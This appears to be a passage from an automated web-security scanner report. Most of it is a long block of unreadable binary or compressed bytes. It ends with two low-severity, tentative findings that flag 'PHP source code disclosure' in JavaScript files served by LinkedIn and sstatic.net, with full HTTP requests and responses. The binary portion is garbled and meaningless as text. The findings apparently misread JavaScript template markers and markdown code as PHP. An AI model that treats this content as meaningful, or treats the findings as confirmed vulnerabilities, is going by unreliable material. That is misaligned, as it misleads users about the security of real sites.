`:.....2.)..N.'..i...s^~Y.,..<w.28P.......3..[.H..............+........P.....#aG.m.~.,4..m...2.-F..Zc...*..<...#.|..o.....Z\..f.K%...w...=....l.1...7./.u...VjR.c.#.%...F. ,6.b.4.".lvu.p.q..{.P..ZP...-...`..2.6?.#..T..v.p._Er,z.w..]&.W}...T....p..M.
..k..H.    n6.m.....b........u....    ....,.....$..[..-b...Ez...    ..WQ...P]7,..[2.....T.."....AB...FL..M..9F..[ps..3    ..:].
.u ..S.rB.....U.._.....*..hd2.3U.*P......e..0..G..... G....p.........S.n.$..S.9?....#<c&.\..;)../..
...`|.w.Ou    . F..=........."..:}..n...%..F+.=..}lx1...{..Q.V,.n[...N.E.@[.F..qg.. ..Y......kM%...6..c.iP.q..A...W..>    1..4......eSk...-g...R^...D6W#*.. .En.r........Qe..%.....;..y...p.wp&
..>bP\...ed.............:?.P.{ w.h.'./P9..DE.......8hD_.nah..nB9'..j9.t3._...*1;...rZ..6.....~S.    ......qm>.<....c...Pg........D).dB...............N.l+b....):^....W...!`..E.qF.......sd=.68XM.5.-DY.zcTl.G.x..J'..!..D?. ....S.}.....*.wG..
Fhk.....VG....'..#..\...Ep..[E.a9....Z..}....Bf/c81.<....    _............,........P......],.k.w.,(..t...0....g.>..H..S...........Xdu!4mL.a)2.S..9.e0..R.D.:.*0$.<V..^........H.#.H..Tn3...B.y..5!....J...W....MwU*k.Rg..s.m........+^>._.......km7.w..P.d{oZ...kc.Z..]....'.I.I...L......i.#.....    ....,)....$..@.*."F..K.V.
..*...q.....9....m!...)...tT@.A...P.......6.X:1......N.,w...u5K03.....V.^..<3....i)Ud..l...QUy    
...-......    w.)..BWi|.F..Ls.......E]...u..}+../.aF.>?.?.-    ....B.3&.u......X"C..1?...j    .~sW.n?......P.B}.S\.h..i..f&z ...?.(.`...C<.
..d.....WF`2dB...@x..@..b.n.....S..xt;v.O..g*...)...x...K..h....s.......='...^...A......
......uk...22......YN.[.N....aX-.......&.....tq0/..s<......n.....8gP...'7Ho
..+.,..MQ|...>..q..V..b..X..rL..... In.Ct......=..f.M...4....z....
C.}..g8.O...k@.T.....D.{........GrI.y...-..J.E..z..XA.v...@:N7/I...k...fy.9.....5|cN/....v...U.lc...`.QI..*..=".....r&..........!v.r.....%.w.).rb..h..0+..x.....Q..z.3<.D...v..R.8......V..k.f.......l+1.g...lJ.)...Q..!..s....z............,/.......P......aL .al.....l.lmC.....Z.u.q....L{.2...4G.$..I.....k....oI..D...'.....=.N..Z.2.M..W..m....Sg:#0.U.).WX.|..X...O..w.[:`>F...1}..%;....y.W..}':..gm.V..............n.Z...T....M] UV...I.b0#*..H|....V..SE..........,I.......P......c..kik.l5..l....kTg.....Y...p...,...    9#m./D.......m...v.j...........*..z6.r*.<..E...........5..|)Zc.b8|.HT.....n.C;.:=...?..t..!....Y.WEU4......V...).*..M.|.......x....E5.yz{..VUm$.I.r....z$....p......    ....,J....$..@....e^3II.$.7.~UNW.2;X.6..X...L..~......12.B..XRc;..,...\...j...Z.G.>...R..k.....ei...S.tM...).k...B....fS..X............e.>g..J..d.....V.W0...........e..........I....9....E.6hZk......SZ..$N..j..K..cO..'.\jH.:9....cr...Ac....vA..@X'.&B.%l.*..72......Y..pi.w....h.._.O..!.\5<|/.....Di..m=..~.    ..
ts\.T..81..Kd..X....
.`..dU.......{Gqk..k......I+I{0..|.Qj.......8.........c!....M...t.
%....W..K..X    GPA..&..wwU.    ......@.C.C..
d.]..nD....l,Z ...e..f....U.X[.........;..........n.S|j.}....;.S.7...L=.Q....3.....8..F.a.Y.G~....t....Wr.......y...1..n.z.....#r....2.6.SN........h..,?G......Bel...{....3......M6Y...l.6...G.+y..@....hr..b!.._qH._~....r^....l:..ngG.9Bq.....X.-.j@...........,c.......P......_L=    a|..)..l.z....;(...;.r....t..J..x....}.'.Y..9....M..........*..t.....b...8j.kf.m..`E..{.".CX@.;....W..#|...vS..U..AR{.|n...=......6|...Ut_.{.....}..,.V....g..O.....C.8...&"RI..b...XO%..6%............    ....,l....$..Z...6FM?s...x......."....<...rf>[.....<...>v...,..2......p,.;G*..X......2..N...W"n.;RR..L.75.......C...&..N<0.....<..P..;.B..p.D...$.<.o.z$B&.g.n../...w..qA...J..3..F...r...........-.t=.i....X....$..%..m..
...5.,.I.:w....\...^6.......!;(..yU=C.k.^..$w.~.7..h.;Pq9".U..b../
..a.sd..t.z.3.X...GC*...w...3j..O...n.&............]..h.U.4a..f.l=U.b.Ac-V.W..w...G...j.K.....2%.<.-.!.o.I..;..X.R$ ....<..xv.u.......:....].MG.E..r.I..................v<.K......#.^...6tIk..wN..M..1..Ju....R.%.3.6-3.f........T......o.>.)I.1..-.......?.(@xN.u=..(S..5......?.7....Z*{.....?..._...K.X.......(....%...S..w..^..0....0.......).V.H(#...Q_.094..1.    ......Z.....R.......8y..2._..g..n..:. ..&V2XV.K.<...........,}.......P......aG..a...%..m.Du}......y.m....v..2M.%]c>...]...CO..Yzkn..p..q%..g.T.......<.".u^.U.kh...i8.n.Z....Z.k..|0Q.........$|...{...
&....r..>..7...]TUS-J.Z..........,U...X..QV.k.JV.-B..........6.I..C.....Gf....    ....,.....$..[...\..V...j|...T.).....]....#.G..}V....u.2M........;.#%..,....afJ.....    H...Q........s...NZ..s#.<.{h%.3.I....{..$ .ZP........,.$..M... C...7y|I...l.QH...Bjm....}.8......G.....v.TL..wz ...?,"k.d..B.....4SVN....BBu...........a....H]l.....?....c.V{.\..h..D)K.RQ..V.mq..$.B..3..R."..I..........f..u.......E...o.YO..R.|.Cj...i!...TO.9u..ilO.......~..
..)mA    vx.[DS...5.8R. ....18..^.O.%h........-e<.%.T$..../8Ex:    _.'...-......
...A....".[@c./..,...@*.......h.Fx.&`...B:4..s3./.".P|7|1..,
.%w.o/.>..........z.g:.H?.a.l7wC    /.'....y...q?\.X...%/.;...4., z..*.7Q..B.T...B...P@..U8Z.."P.c........o....wf6..
D%.=...    .g.&,[.S...*..
......ZM-.)......d...E.3...........Qc.....D6.J....7.!?..............,........P....(.eG..au....-l...}....iq.z+..V..mcy...&...4...M....O..GWF\u.=...Nu.8...A..s.B...XH......V....!*...!....D..^.8+..4}.&8.....w..{.C..mB..+0L.(Td.8...W.m.......4,'......e.U...?...P.sQp...6.N..uK.$....t..Z....    ....,.....$...fL.D...D..P.......X.Q.T<.....8....iAQ.(....m7.@..\....+.V...M@{..,MD.i.Z.)....iV(............&.A.t.M..;f-..S..
i.+...6'...........,..X&.R'P0U....vA.)...K..) .|.6]..=.,,P.<.PS.fcs[._. ...JZ\.8..6..........A...di........F..X..1>u>.......g!."....K....,.g.z.....b0....z..T|.zS.G.Q....l.l....3L..>..AO...>.5.~.J..q.7kbp,&^......
.$...l......*r.?.^q...@.;8..".B.V....6..W.i8O.h..#...pF.E......G..uABf.    .aJ....kY.P;.H%A,.l.6.......^.l_].......<q.^./u.b...Q..Q..;..Q.._.......97.&...............;#...D..<t..r..\K.34.... ..T.I*4.F.@..........W.
..K.C~*S...&.$.....;.?BR.jY.Q.....v.aA....V..8.v..h...Z...H...YSIo6.n.s.C4...Qi9..P.R]m.Z..!....k....0.............O
...&.b.>)../'.P.^N........|.+..........h.`I.!.....kAb....mZg..h:......e`....y..!..N........4../.....V.v...2K..Z.....c....d.7..`.YDY....q.U.]...~......j..C7....HQ......nkdN..k..z.{..j..3L.".>._.......{.....f.?e.d......8g6..kW.n........w...Y/{.d.&...<.j.0(|.....TSr.......J.0.`|.n%.k.tq...GU...0...#.LQ[..Z...*.Z.)....t..[av+0.>.1`.....
c..a.G.RU..}.C..p.&&FB........R+..._.yE.....?...vk..\..X    ....yc..........    ...C......3,.h..AT.b.[jz4.h1....bq.%E%..
Y...:...-...!....1"...#.    ...#W.c.....y."..U,wS[......&.F~.o.G..........|...;...|<~.z.s.[.\.
e..K..z...\.K>...|<(...l..r:y....0..a.6.,....=.......4P...........,........P......e..........lfKsn.........1v1..i~.<yV.9.{...4?H.iAa...H2    E..="..mK.W.8......?...7..8...." ..&Co..l].-k,R~M../M.f.}....@j..TgQj[..}........o...k,......9Q.hC....?..@1.....l.}.....g....Nh.}^q../....\............,........P....@.gL=.ar.....m    .7....yfO...jg.CpP...0.P....^.WW]J..,.h    .\.>yM0N(.-Kj(.a    ..}.f%.v.B=...M6.m9[...h3Go.....Ee*E\V...Z.......Ue.|...l..|....l......}.~...
41. ..w......n....v.!kR.z...[..7.J\S.K.-[q./!...@L.....    ..S.,.....$..@D.~%_..-H..........":...R........k.|YW..N...=..+..
./.c......_.5.......q..@.......A..V|..Y......{.F....8.z.e.c../.!...ct..
.y..~xa..}.......1+..k...).W5....1....!.<..e.C..BS..O............[..#Z......A`.[....P..~.!.+.)N....!.....s!,..P...u...m...!#.....`..j^Z..Fi}.y...O.fFm...<5...Z ..*.#.......{    >.P..8.D.B......y.<...NP..g...N...47.2....}.U....N...P.U&...i.:xa.'#2...U.I.......7...E.%o..)..ll.....?...C8+....c..C.....E@..G...9&n>......'.;.T.]......Jg.Bq.~}.9.w.'..u..[u...@.&.......2"v.q1...:....8G.i.;A\A.......N..9...tG.h.Y....o..v.}.$..oQ!;P.v...9...a........,.!hR@k[s.VjPA_...........^.....,........P...
.eeL=i!..,(..m.....'...".O,.U.;..u3.........Tv..KCUx.<r.....i..Qp...$...L......&..r"....i..r.......:c.HQ......yP.\f.......5Lt....g<...p...p.....o....    ].B..e.A,.;.f...U....{.I.|....Z.m6.JV....X..........    ..A.,.....$..A.....1...._F.U0..../1...... .s.5.....}.~..|a..._h....Y........d".i.>.Z
0.....3%.dV..|..L.....T...8.k................e.*rj..7.....b..\.G.<e..?'B.....b....^.M......$&.....t,....'...A-.........^Gq.g"....u1hp8{...I...C.B.....wD..Jl?.B..F....
y..sESN4q....4......<A.."...U....8...C.O..z.>I...5..q/...^,s.......R...Q.(..P.E..tW.....pTo.FS.`..k......UH.J.~cg.w&.<J.N8.b.Z..y.....,.O1.l....E......!......c.V..s.....*....ZN/x.....
^.E.*....    .<...?...d0.p8\...    ...u....t.
kKFsD'"....a.....0.........E.R.d.f...3pH....x.g2...)J.8U.R..w.}.|:....?....a../......z.J(..e.....+....YV.....L.....-........P....l.aL=iaz.lt..,...O@......>K....?2....U.h..9x;a...Z...,.}...@...G..:L.`.}i.jj.........f.f[M..........Vnj.y.......%...;.K..e..Hj.%.....H..R..h.&y.b.k..&...H/F<.......>...^H61.......m'.M.f...6i=N....H{d....    ..V.-.....$..[.......@.4..PXs..=.Hi......;.!.&..j..8...M#_Q......lR..',..jO0p...UM...n..Yy*T.+~....^:..s.    .dR.Jx...!s..d...N.{.....y...W..z..`.D_../yv*.2D.]..m...j.[...L.....rYm3..Q.......2.c{.!...?i.U.....d.C......i.=.:Z]...........j.A.m...;.%(...B./.jS!....
eH7N    ....qh...._.u......w...m.y..%..L.V._wZ^...    8L2..e.\......I...(..v....,.    e...1..w&F.{'..c...Mc......E...f....6k.......>........T.\I?.8.o_.Qn..9...1.e$.....P....5*.].]...n.I.
@[.6/..r.f. 2....b}..`h..YAAK..%....F..`?..RW..`.#.G.}A7;qL_0..,.J..{......rh}.FJ.4...............:..2g#.y.9r.#...../@/.E..........l.,..).y. ,.+Xf...m(..+...S...V.b......a.....-........P......cLE    a...h..-q.H.M...6...9..U. .....']..i..s..i.&d.lN|...4..\U6...,Zl1"...^G.
.}...TU......r)..
=^>.J&.H$..........]z9(...L..(.~.Q....6...8..]kZs4..]Y......-lx...~..p.....7.@EX..%A....K..Q...S...L.;.....    ..Q.-3....$..@U...H(....k@@y...v...<....0...,-.....UT.O2S.......x.1L;.!.7n7
v..Zx.?...............`S.>.~r.~2.......'...:..D.2.S%.SB.R.S]O.N.#.O_..x...lX.nD..4.....GH..........p....c'g.3..dz^"X..M...px.X*R.5g_N1.d:n.........LI..jU... l.....b..w.P..BS..4..K.%......"2.4N.....N..>X...|..I.D.Y..Y?....R_0..qN..e.G..-..............b..[R......w|N.7;...b..0.31...E[......y......8.....Mu.    F.e.....%...a_GkI...>.c.....v.. .9R..G..z.Y.....d..nDd`..>...k...Y.....Z..........ztC*x..9OoJ..NpA....$.vv    ..$5......v.e^y.. .EP..cx...?.M...c..).w&.....6x\.....(>.5.ii...NM(...........\.Sp..... ..(.7.b...7..E.......\.....-4.......P....hocL..!m....-%.Tfr......._.t\.#S<f9.e.......u..}&.M .F..(T... .u......9.....WK4$ER...S....r.k+.@..0.)T'    >yc=.q$..}.}D.B.6g"...w#.n.._...B.8...P.....6..~..    
.i.........>.zf.H.Qn9$.L...l.<.Q<..2..Fjs..q.........-N.......P.....eL=i!g..$..%....,..}.;..X.........[a..R.......#X&..^.y.V..x.....y.B.8.u....u.wT.q Z.m......J..pPN.uZ.aH.L.).1.3........@.XA.40..I..V.)3......!,.T..3.......`... n*.Xt}..5.5.e=6.R.T....S..........._.QL....    ....-T....$...`.L._..#W...
........=...B.\ %f..(i.....5.........~$..Q.X.c:c}....A.[...F.<U\...;C....l...._3GkI.....f..e^.t...y$Q.:{..~....... ..\.........V...........J0.D.T{0g]>h;1.....*!xw...j.bH..A.WT...'...........&v....8..s...    W....f8....3..$q..."...(M..MP..).`_..r0bp-.LT...6.....1..f....g.-..R.!    Pc..<.. ......g..y."..U.7W2.cN.#m$...    .y<...E...I`...n.S..f`..}.//......^g.H.
BO...dpB.:...L".P..M....9..2..........b..h..Z.+../..x.Xx....]x.L...;...C3?.b.?......./.L?\a...l.Uf..F....|.
....v..[D...Frl.8..
A...CI..!..k"h...........?q...P.BR..q..k.\.....3.h.u.^.o.{..CY....4..},..I4L...S3:......m..`..Tn.)d.j.Yb......(.
.&.....4.......k]S)..j_..:b.yB.....*...e.A*.(....n....y...;.v...;....L..!.<...U..L......U..U5.6.w........`...`.|..5.".I]S    .\....1n.,^...........|".9......}F...VbZ.H.e........up...5%\.H`.k.tD#.......C.....YY.c.W.d....R+....r.....?X....u.S.e..\...z..Y......... ..{..g..L.....Bj..nT...w..]...k.5..3.8v.J....fS.C
..MA.h
].C{..e. -...7.<K=4..w6.L-(..)[5...mE....kl...w..W.....'...<Hs.L.6......&.-...x.o..H...........-h.......P....x._L=)ar.....$<..`].*.....UO......XR.7=....k.M...G./.    ...:|.V..D!.P...........3..6.$..rI.x.....D.ddCJ.....3...t...l@.-&......8-..)dx...Nj.#..j.....k.l<.........bP....c......[.=.h$.Jr9#..P......!..].P.0....    ....-v....$..Z..f...(]..
/=...w,........K4.=..../.    <Pk.L.{b.....(.    ..j.....<'.....}s........*L...6.n...<].%.    08....U...:../... c.s.m.9...|..vW...
....8..63.;....EV....l..='>..#E.e.....;...Z......3v0.[.rt..v.V.=...0..V..u.....=.,.....w.Y.,$L.X$9...~.........t.q_.C\|/T /..\..Qw........C....FE..........nk.......j.!.....;..t..,...&...LO.#...nn..A.l.@.....~GIH..d#,....k...p.MH...L..M.....)BF./...f^....z .....zB]...........K?....VP.H..Bs
...\.cE.x.J...`W.>.C....T..w.....b........f>.b1_\..)..Ll.].i.....>...@[Y........>....).w................-........P......c.=.a..+...l.|d..s...}.w.~\$.$...X....L.~.%<...A3&"/@y
+N.....r...hI..`3....Y..GU...)Y.I)&..6......t.H..+.
....1....N.j.q$.._.....3gm4..l.+..>qQ.....w9...cc...?>
.C.>
...[SNIP]...
.'..k......*..K..........q..Ot.......qu2...i..(m..>Bok.A...^..(.9...ny.....)<@))....!..r..1/..s.e.M..pl........v)(........C...7.M........<./-........s._M.F.R."P.U....."....M...C .?`e.+...o.N^4..v.....E6wz$-n.e..!....f........||.%...C'...ul.t\..(.....l@.;..9...^.H....Cj.........p.x
.2/ 3.......vO.7!.5j.H2...K......3+F/P....m..    .b........I.-t..;.T!<...gt.]U. ..Y..R...IO.K}I..;+..&.(...g!.S.[....1.{.@......:.....5........P....d.a...A|.....l..h<;..8.JyhN}.@..RI5S.I....\.8K..cc0...<7....8k...{....A.H.#..7....H;.L......L........O..k=*%.>. ....`..q..Sm..mI...R.C\..92...:t.I....L..<A...{k......7-YA......Sr.#.C.^0\..n    ......h..........5........P......gLMka..,h.1l......O..i...AAj. <(.b..p...Z.+AE....YJ...&..n?P.< .8.....?`F.....~...w.z.;.rX....../_.{/c...+.h5...?..AX..;g!...d.i..,...2..F.D.GH.UH..nso1..Hj}$$...C....nS.(..r%.........?]..k.x....n......    ....5.....$..@..6`.0...EY.......Iy......../........n..#~v..>$.t...L....d.."e.....o........G.....M1.^.......i.].pl.1.X.P....j........k.w..:..nT!......SK.gx)..G.aM..2...Qx....Y...k...z....Y..k.<...$t...tL.....f<.Ac....+..+..T......w..ag.%.d..;.....`.4V...._R...Z.....}..b....%...y9....uh.9    i.2%Y_..b...:....Y..I.4{..O.#..dc.v_..y..4.C...*.sS.).+.t.....,..iZM.....Y.6..v...    1.=.....;..........2..oNU.k.'.o.a....{.AA/.=.?z.-.6?...CLE.v9.x...P~+...~...3L....T.._...U.B..>H..f.3.;...y+..`.M2..W.TX.@w.O....{.....w<....P. ..}..(ml...f...W.8.khP..........{:k[.b."..!B".}G......<..V...I'....b...n..z.....$%...7.....9
..D.._..Mq.w$.*..z1..T........}...p..w~.>.@!.^.b..O.R.A...P.>.S.
......_..b..;.....D^. ..tv..K.4e...:.\..R.;.v*.w2.H.....P[
..%.zf.m|g    .../|..$...............5........P......g...a..-4.!lo|.X..\...._w..Q0t....C.....W..v..u..l~. ^j...*tM.'Bu(...Q.-..........7.?.s.o..{.....d......}r].....~...n..t0.@..;I.N..1l..8.
.    t..E$.rm...w]X..,.,.h.!.0.K..B......k...y.....,.=.....|0.6.....    ..m.5.....$..@..Y.3....q,.R*..{}N..............nIC........&./c.K@jv.0\....>.a.......XK...;.....F...Y.l..>O..*.....L...O.....&..W5...... ..%.u..FMy...s...VD.UL..0...Q..=.U.n\.*|.*&...M..z........J.02......ny.1Wu..".u+...*.o...'."']...l.96Yq    ......0J.@.$:UYF...G.~.....G..7$.......P..o..8..8Pr....'.....F..J...4.(.C.................2RB>....I..;5..j.,.{F.HLq?....L.u]N......:.... Zl......A...o..8..2y..|I7|4-..^.O..+..A..n.&..Y...>......m.IE.|.B......tRDWlb 'jQ....2....24Kv~.?(..y...Gj.7.T.xd...R.rR..Y.$&!.|....5.j........5.C.Af....FJ.G.^..-..>4.}K....*...>A.l..$n....u....q..*....p(.....7...&.W......;..S.x.Q..B......:;...I......wr..sg..I.;(..,....O...Y.....l........{..Y..Y...o.`0.f...S:.".../
.Ki..^.{..i../X.....K..JY.i.u.}....v...,.q...../..E..`....{.O..'#..X.>....S.ul..Vtg...J.........Aq.AQ....tM....2Q<.?~}..e]+Z.!.L%..Q........M8:

.`.......$.M.].5L2y...fs8........s.....x.....5........P....4.e'..a.m(..l..qh.s...5;.._=.Q.....&....W....s<(YUei.........*.......L.0+...S.S...z.'l,...."    .......^..?..=.;...7n9d.`4....<A.t.P.i.....8f.RH.H@.....    *..
...1..p.c'j.}k...e.G{..j.(....H..fG.'A4.R*6X.....    ....5.....$..@.$..6s|..B!....u..O..0.]Z.?0....'...j5{..w....>..y|.W..HH....."~.\....3..j........!.&j.+........>JH.....>..J.....)..@=q.M.6+..1...O.9.).. .....3.O3z..Uw.....a.'.0..]8.C.).lN..........*.-W... >r.E..M.......U.?v<u}.z$.)....g.3..zP4*.....c./.z&..u.\...&_
ZIn...<....e......5F....P.5..K9n.B......e.}'"..~0P.5.<....]I.,..?.A.45M.d~."<.W....K.s......."..#...Y.......1....U50.[..4...G...wv'. .S5..'D.l... .^.....Ut..s.:..s.....e-RW....b.....v0#.E1...O..}9
.......ep..8E.m1....mA\...$......X...^q.D...v."L.n.../|.....
.J.B.D....... ...^..D:.a!WJ...G...3....B.#...c365..Y#.l+.1.T)......7...m&.\<..X.$...l...Lx..%(....p..O.$.WTb@..b.!.R....E....."P.....a.lZ...LQ...3+.W....a..SBaa...Q.?.[......q.D.m.6.......K,..W....x#~......9..S.*p...u.9/.Yb.....g...>K.R.............5........P...
..k'..a~.-u..ll....e'.".Y.k...........Eo..w...@YZ.$.N..E.EK.&..GE    .`. 8&...3. .O{.)..1ZoL...u.b2.y"...o..N.os.n!FN.".j.....+.q....g\.r..I$.pHh..&6.......!.(.L..7.6..ww........1W4Rn.]@....fR.$e\..O.}......    ..L.6.....$......"&(zx>...?........{...~j4.=V^..b.9...p,<....E;...>9..O..'..zQ..e.w.....|....h.'...u.\....HgU.u8'.'    {Y.<....|....6r..q.... .(uw.....}.
..C!..)...,.....e....d..:.....y.....w....N..H.Co!    .R.........hZ6..5.rb..=..6;../%....P......H>....QW...........Wa..M.).N.ey=...H..b.....Ka...A    .......n..>..h]Y......^....Y......E....^.._W.G.m......d..}.:T3T...}..|..2#o.f..."Y..........._*.~1...\...m..w.r.z.YYD.R..-.?........"YV...X......)e.%Fbi..S..I.{0<.#..=..r.f.]...9.u{.    .XH.......t1R..:...'..<$.]..V...C..[..$....Vx...%...s.;.]....c*0;).L...%7M....h..)2x...Jt...%foC...s`".!........Z...3].8..^4..y...cj...~?.'.Uj...H<6.dO.3).....x.u..:..n/.O=nO..?..Qv...z.<X..-..o..eEZ.....s.z.........M...\..n. .y.S%...Z.[.]0.p.E.....E/4..4......5....%....RS.e...g.X..q....=C'[<....d.:...S.f.....iDW......$R..M.;L..Hh..A7.r.../....EM.t#R...G@.`%/L.~T.z.|../... .^.=....[n&b..7e.......k....B..7.9..4..6V\..%..)2#...L..<.[ 2..9.K..n.@V..!l.Z=.6....6...&..-...u...%. ...MN...?..K!e..B...a!.j....I....1.,D..v..........b.N..r......~."...E.O.
.t.g3..mGo...A..0p..\.....@.pO.A*..L...s.....V..    ..[...3u.....?)\..    xB.b...^)0M"GH|.......F
..*\.k.#.GK...C/..Rto.9a")@.5..z.......N2!K.&...........c.7n._....6..;...S._..<Qz..2'f.M4G.lK..f......y..t_.v!.............<a%..`.....d...2_........<`1/X#9Sy.x!.l.-5.........e.M,..    ..sg.)....Dn.p..aC..].
............P........M.p..Y.....W.....6........P...
..i'.ka~.-(..-..;S ..D.x..^.#kJ....q.@~..I$.I.^%    ........M.L."...Q<.8....F...L:...g.U`Ti..&.B.......>..V.. .....A........i$.pY.C.G...V...<@.`.    6=...t`,...    ^Xe...v.\:..9@....$q.................x..Cij.........6/.......P...
..iG.kaf..(.!l...,...g\...b..]^.$.Nj....T5.*.WycX...'#n.Y...r....o..s.y......    .:s...t....o.=...'    (.&..[.c....`....U...    $.(..h.....$..p.......0.[..c...-T....k.z.X.l.'1..#[P.y..7....yi.F\l....(...s........    ....62....$..@D.x.....z............t.%T..G....YNf..;s.'4...7.2.Hc.4..h...J..~"..;......P`)".......Q.o.....[n)S0..g.q*......*..X..o...S.....K{e.....T.8..D..)..}..X...5...S/..nV..;......U..u+.....~nR.....X<.HD........._.."vT....<..........d...8"F}.....u`...... ..f....M....B.. ...V....#pIW..Rwf.........Kk..e.Q`H5....).F.=......3caO...i2..T....;.pe....?r....A.Kw.I...V..{..>.H..+p1.L......%.V..~..d7.
fwPz..K..T.....*Uk..Z.    .R...t.?..xW...P<..5K\........T&..&Y...8{.3]7.B....)=t LO9(.:..    .M......r.an.?..................J........|...E!t .{-.....jkH..c....!..i...qV1..A.......k3.FV.o4.e...i.x.@3.Ab.-y.y.o.E.Y;....i..(..h|..".X....9.G..o........?v&.........g..."...97...J.uD...P..n..-.bK.......x.rH.......Zg.?.o.f.3D...I6.9................6I.......P...
(uk.ai!...4.!l.....(_^......U.Z:.b.gg..va.....#...O.......D...l.....C...V+.....[bc....B.bJ.G...{.B.......>.T.i%6.6c.B..u2.....@@~......n.....5......Y9. ~....0..3.q9i..........*H...|....gK..:}..I..j.......    ..).6S....$..@..-.. ...A..........H.x)
c...b.?.......@a......1..yA..HE1.E_.J....<N....    .x..].K......C0
..-.C.<fL%N~..#..G..3.Zt}i..`..&{.n~}....ud{b......N.F'......T+]...Ss.'...,...jG7(.9.;...{......j.'E3@.Uy....2].....L]..v.:.._....R....q.E...gz..\..u.H-.E....?.......]...C....k..3.....fB ......I......?..[..@.......8N.3.&\.....w
.U..J..'........=........    ..d1.n.......<.....o}2U..j......H..I.\I.R.;..:l..kR...U..........e...\.W...
Y..3+    ..@.9s^O.    o.eJ.k{......m..jE;.r.m.c.....V.f.C0.....u.2.u.R..>O..... .........).;b..7(s......uP...`.E..N..d.u>..*....$..`R..7`/j...i)...@. .W...V>DL./..E...)9F.....+9.).K)...]..)dq...#h.-..I.,..]2.....h..._.rBJ-d..>R.f..<.:...5z...5..79.kw?>
.
...>
...[SNIP]...

19.3. http://platform.linkedin.com/js/anonymousFramework

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://platform.linkedin.com
Path:   /js/anonymousFramework

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /js/anonymousFramework?v=0.0.1102-RC2.4598 HTTP/1.1
Host: platform.linkedin.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&d94e49db-3c23-4a26-a29f-2bc2d85c808d"

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/javascript
Date: Sun, 30 Jan 2011 14:47:56 GMT
Expires: Sun, 06 Feb 2011 14:47:56 GMT
Last-Modified: Wed, 26 Jan 2011 01:45:14 GMT
Server: ECS (dca/5334)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 79269

(function(){
var l, doAuth, h = "${VALID_HOST}", a = "", fwk = "http://platform.linkedin.com/js/framework?v=0.0.1102-RC2.4598", xtnreg = /extensions=([^&]*)&?/, xtn = fwk.match(xtnreg);

window.IN = w
...[SNIP]...
<?js ?>";
l=l.split(" ");
var p=l[0]||"<?js",o=l[1]||"?>";
if(!p||!o){throw new Error("Template markers must be set.")
}if(p==o){throw new Error("Start and end markers cannot be identical.")
}p=new RegExp(b(p),"g");
o=new RegExp(b(o),"g");
var n=["","var p=
...[SNIP]...
<iframe class="<?js= frameClass ?>" id="<?js= windowId ?>" name="<?js= windowId ?>" style="<?js= frameStyles ?>" framespacing="0" frameborder=0 allowtransparency="true">
...[SNIP]...
<form id="<?js= formId ?>" action="javascript:void(0);" method="POST" target="<?js= windowId ?>" style="<?js= formStyles ?>">
...[SNIP]...

19.4. http://sstatic.net/Js/wmd.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://sstatic.net
Path:   /Js/wmd.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /Js/wmd.js?v=508538fa9757 HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/x-javascript
Last-Modified: Sun, 30 Jan 2011 11:16:50 GMT
Accept-Ranges: bytes
ETag: "c48fee306fc0cb1:0"
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:40 GMT
Content-Length: 39657

var Attacklab=Attacklab||{};var Attacklab=Attacklab||{};Attacklab.showdown=Attacklab.showdown||{};Attacklab.prePreviewHtmlHook=function(a){return a};Attacklab.postPreviewHtmlHook=function(a){return a}
...[SNIP]...
n"+I+"\n\n";I=r(I);I=I.replace(/^[ \t]+$/mg,"");I=e(I);I=m(I);I=H(I);I=E(I);I=I.replace(/~D/g,"$$");I=I.replace(/~T/g,"~");return I};var m=function(I){var I=I.replace(/^[ ]{0,3}\[(.+)\]:[ \t]*\n?[ \t]*<?(\S+?)>?(?=\s|$)[ \t]*\n?[ \t]*((\n*)["(](.+?)[")][ \t]*)?(?:\n+)/gm,function(J,K,L,M,N,O){K=K.toLowerCase();f.set(K,k(L));if(N){return M}else{if(O){F.set(K,O.replace(/"/g,"&quot;"))}}return""});return I};var e=function(K){K=K.replace(/\n/g,"\n\n");var I="p|div|h[1-6]|blockquote|pre|table|dl|ol|ul|script|noscript|form|fieldset|iframe|math|ins|del";var J="p|div|h[1-6]|blockquote|pre|table|dl|ol|ul|script|noscript|form|fieldset|iframe|math";K=K.replace(/^(<(p|div|h[1-6]|blockquote|pre|table|dl|ol|ul|script|noscript|form|fieldset|iframe|math|ins|del)\b[^\r]*?\n<\/\2>[ \t]*(?=\n+))/gm,l);K=K.replace(/^(<(p|div|h[1-6]|blockquote|pre|table|dl|ol|ul|script|noscript|form|fieldset|iframe|math)\b[^\r]*?.*<\/\2>[ \t]*(?=\n+)\n)/gm,l);K=K.replace(/(\n[ ]{0,3}(<(hr)\b([^<>])*?\/?>)[ \t]*(?=\n{2,}))/g,l);K=K.replace(/(\n\n[ ]{0,3}<!(--[^\r]*?--\s*)+>
...[SNIP]...
